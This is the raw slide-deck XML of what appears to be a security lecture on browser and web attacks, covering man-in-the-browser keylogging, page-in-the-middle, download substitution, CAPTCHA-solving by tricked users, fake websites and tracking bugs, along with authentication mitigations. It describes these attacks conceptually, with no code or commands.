            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever it saw a user going to one of those sites, it redirected the user’s keystrokes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>recorded customer details that it forwarded to remote computers (presumably malicious bots)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detected in 2008 by Liam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Omurchu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of Symantec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861A2CFD-3F52-0C47-9A64-10D14E1DA07E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244882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594572-2DF4-0F4F-8336-CF8BE8EE41B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rise of the Hackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBCCFB1D-285B-8842-858B-6BFBB0E5CD42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Rise of the Hackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55CD9932-FC63-E74D-8786-ECFA5AB7DA88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2240948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Keystroke Logger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Hardware or software that records all keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>May be a small dongle plugged into a USB port or can masquerade as a keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>May also be installed as malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Not limited to browsers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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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020337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Page-in-the-Middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>User is directed to a different page than believed or intended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Similar effect to a man-in-the-browser, where attacker can intercept and modify user input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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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89203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C3BE-D292-184F-874E-FE710F12A3E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page-in-the-middle vs. Man-in-the-browser Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CE2D53F-C315-9747-BFA6-F9161D819E6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Man-in-the-browser action:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An example of an infected browser that may never alter the sites visited by the user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>but works behind the scenes to capture information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page-in-the-middle action: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker redirects the user, presenting different web pages for the user to see.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52B97860-8F71-FB4F-A588-60B1A24C027F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1315605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Download Substitution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Attacker creates a page with seemingly innocuous and desirable programs for download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Instead of, or in addition to, the intended functionality, the user installs malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This is a very common technique for spyware</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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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14911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User-in-the-Middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="fig04-04.tif"/>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438" r="38263"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="282222" y="2130777"/>
            <a:ext cx="4065291" cy="3744637"/>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using click-bait to trick users into solving CAPTCHAs on spammers’ behalf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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176354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38F4-7A56-764E-8CE2-769589562E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User-in-the-Middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{038DEDCF-6D42-B147-A589-92907B71D2CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CAPTCHAs are used by websites to defeat automation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>such as by preventing spammers from scripting the creation of massive numbers of email accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using dummy websites to entice users into solving CAPTCHAs, attackers can effectively defeat the CAPTCHAs at scale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11BC3671-8C84-054B-A8EE-CF713DF3CBE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3258947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Successful Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The attacks listed above are largely failures of authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Can be mitigated with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Shared secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>One-time password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Out-of-band communication</a:t>
            </a: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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1"/>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21873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Fake Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-07.tif"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="181" b="1302"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280246" y="1558153"/>
            <a:ext cx="6559236" cy="4811059"/>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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345059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Fake Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-08.tif"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-160" b="-2247"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1506498" y="1456844"/>
            <a:ext cx="6102405" cy="493776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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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558953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Bug</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-12.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30" b="-669"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905622" y="1601270"/>
            <a:ext cx="5329328" cy="4796628"/>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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9468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Attacks against browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake and malicious websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks targeting sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing attacks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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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404705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1352-8C63-084D-B452-9BF728C77B5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracking Bugs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0699433B-BBA6-7548-9BA6-BDFEA3962698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A tiny image served up from one provider (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ClicksRUs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>allows user behavior to be tracked across many sites for advertising purposes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You may notice this when you see web ads that offer up items very similar to ones you recently been shopping for on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>other sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bugs can also be used to track users’ reading of advertising emails.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A597783C-9D9F-BF45-9ED1-4348C0375440}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4156328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B37D5D-C8FE-4427-ACA7-5499F2A5BD98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most serious endpoint security incidents</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in the US (2016)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DAFB3D2-D1C9-44F9-91BC-F77BB025B122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1537546"/>
            <a:ext cx="6348413" cy="4590943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5361EA9-372A-4F85-8421-EF65094AB91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6400800"/>
            <a:ext cx="6124112" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://www.statista.com/statistics/203186/top-endpoint-security-incidents-usa/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3322149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B37D5D-C8FE-4427-ACA7-5499F2A5BD98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most serious endpoint security incidents</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in the US (2016)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DAFB3D2-D1C9-44F9-91BC-F77BB025B122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1537546"/>
            <a:ext cx="6348413" cy="4590943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5361EA9-372A-4F85-8421-EF65094AB91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6400800"/>
            <a:ext cx="6124112" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
